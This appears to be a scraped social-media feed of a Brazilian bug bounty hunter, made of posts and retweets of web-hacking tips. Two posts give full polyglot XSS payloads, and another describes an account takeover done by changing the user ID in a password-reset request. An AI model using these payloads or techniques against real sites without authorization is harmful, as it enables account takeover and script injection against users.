elsec
@adrielsec
Followers
4K
Following
220
Media
205
Statuses
6K
🙋♂️hacking profit and 4fun🪓👨💻🇧🇷
nolocation.onion
Joined August 2009
RT @c4ng4c3ir0: Amanhã as 19:30 no discord da pirateship!.@c4ng4c3ir0 🤝🏻 @Mariobrowww 🤝🏻 @stux_rs 🤝🏻 @ofjaaah 🤝🏻 @adrielsec .Link no coment….
0
4
0
It’s almost 2026 and this crap is still out in the open… DAMN!!. #BugBounty #bugbountytips #bugbountytip
5
9
120
"we take your privacy and security very seriously" BULLSHIT! HAHAHAAAHAH.
'123456' password exposed info for 64 million McDonald’s job applicants - @LawrenceAbrams.
0
0
1
RT @theXSSrat: 🕷️ 100 Web App Exploit Ideas for Bug Bounty Hunters 💥. IDOR on user profile update. IDOR via email enumeration. IDOR on subs….
0
57
0
RT @theXSSrat: I think @Burp_Suite pro version is one of the most powerful content discovery engine's on the market to date for a very simp….
0
42
0
GitHub: Read the 🧵 and decide whether the tool makes sense for you 👇🏻.
github.com
unleashed ffuf. Contribute to sw33tLie/uff development by creating an account on GitHub.
I've recently put more work into my ffuf fork, uff, and I think every ffuf user should at least give it a try - and maybe even switch to it. Here's why, in a #bugbounty 🧵
0
2
18
RT @RyelHunter: RCE in March, IDOR now in May. Bounties are coming in through study, method, and patience. Grateful to @crd0x49 for t….
0
2
0
Macbook Air M2, Bateria 100%, 16GB de RAM e 256GB de SSD. R$6.5k leva embora, chama direct ✌️
1
0
7
🚨ID in the URL, parameter in the body is another account data change report, I typed the text of another subsequent report here, it must be sleep 🤣 I'm not going to delete the post, it'll be in context for the next one, which is on the body.
1
0
4
ATO via ResetPasswd. Critical passwd reset flaw: after requesting a reset, I intercepted the POST with Burp and changed the parameter ID in the request body. I was able to reset another user's password without prior auth. Any user ID worked ✅. #bugbounty #bugbountytip #intigriti
7
5
161
they don’t fix it and just let it keep spamming duplicates in triage… A MESS!!!. payload XSS: /*-/*`/*\`/*%27/*%22/**/(/*%20*/oNcliCk=alert()%20)//%0D%0A%0d%0a//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E\x3csVg/%3CsVg/oNloAd=alert()//%3E\x3e. #bugbountytips #bugbounty
2
55
318
RT @coffinxp7: add this in your hunting list:. ffuf -w subdomains.txt:SUB -w payloads/senstivejs.txt:FILE -u https://SUB/FILE -H "User-Agen….
0
187
0
"I’m late!". payload XSS: . %3Cinput%20type=text%20value=jaVasCript:/*-/*`/*\`/*%27/*%22/**/(/*%20*/oNcliCk=alert()%20)//%0D%0A%0d%0a//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E\x3csVg/%3CsVg/oNloAd=alert()//%3E\x3e%3E%3C/input%3E. #bugbounty #bugbountytips #bugbountytip
4
37
303
0
0
6
RT @theXSSrat: 🚨 Bug Bounty Web Checklist 🚨. 🔍 Recon. Subdomains: amass, subfinder, Dir/File Bruteforce: ffuf, dirs….
0
70
0
0
0
6
НАНАННАНАНА mais um "Made in China" para surfar nessa grande onda. Quero que pegue 🔥 Isso empurra os.concorrentes a "se coçarem", os verdadeiros beneficiados somos nós
0
0
0